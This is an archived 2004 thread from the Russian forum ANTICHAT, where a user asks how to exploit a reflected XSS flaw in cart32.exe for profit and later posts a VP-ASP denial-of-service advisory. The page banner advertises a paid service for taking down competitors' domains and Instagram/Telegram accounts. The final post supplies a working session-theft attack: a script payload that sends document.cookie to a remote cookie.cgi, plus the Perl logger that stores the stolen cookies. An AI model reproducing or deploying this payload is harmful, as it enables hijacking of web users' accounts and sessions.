Shop — ANTICHAT Forum

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Shop

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

15.09.2004, 15:46

PUMA

Новичок

Регистрация: 15.09.2004

Сообщений: 11

С нами: 11394908

Репутация: 0

как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
для получения полезного

𝕏 Twitter Reddit Telegram Копировать ссылку

16.09.2004, 12:36

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

С нами: 11627066

Репутация: 42

Дай полный адрес

16.09.2004, 17:54

Че Гевара

Администратор

Регистрация: 05.10.2003

Сообщений: 1,084

С нами: 11893346

Репутация: 45

PUMA, а смысл использовать xss, если это подействует только на тебя ?

16.09.2004, 20:52

PUMA

Новичок

Регистрация: 15.09.2004

Сообщений: 11

С нами: 11394908

Репутация: 0

стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...

17.09.2004, 12:25

Algol

Регистрация: 29.05.2002

Сообщений: 1,794

С нами: 12604706

Репутация: 0

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS&#39

</script>[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль...
Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ?

17.09.2004, 14:23

JazzzSummerMan

Постоянный

Регистрация: 07.04.2004

Сообщений: 387

С нами: 11627066

Репутация: 42

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'>
Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше
Потом продашь кому-нибудь.
Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ

20.09.2004, 02:59

PUMA

Новичок

Регистрация: 15.09.2004

Сообщений: 11

С нами: 11394908

Репутация: 0

ну вот можно купить чтонибудь ///

а вот ещё один ктонибудь сможет реализовать ?

VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open
A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system.

The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues.

Impact:  A remote user may be able to cause database connections to stay open.

Solution:  The vendor has described a fix for 'shoprestoreorder.asp':

09.10.2004, 04:42

acidhack

Новичок

Регистрация: 09.10.2004

Сообщений: 4

С нами: 11360994

Репутация: 0

А если по-думать головой?

<script>document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script>

(cookie.cgi)
#!/usr/bin/perl -w

open COOKIES,">>../cookies.txt";

print "Content-Type: text/html\n\n";
print COOKIES "----------- new cookie -----------\n";
print COOKIES "$ENV{'QUERY_STRING'}\n";
print COOKIES "---------- end of cookie ---------\n\n";

close COOKIES;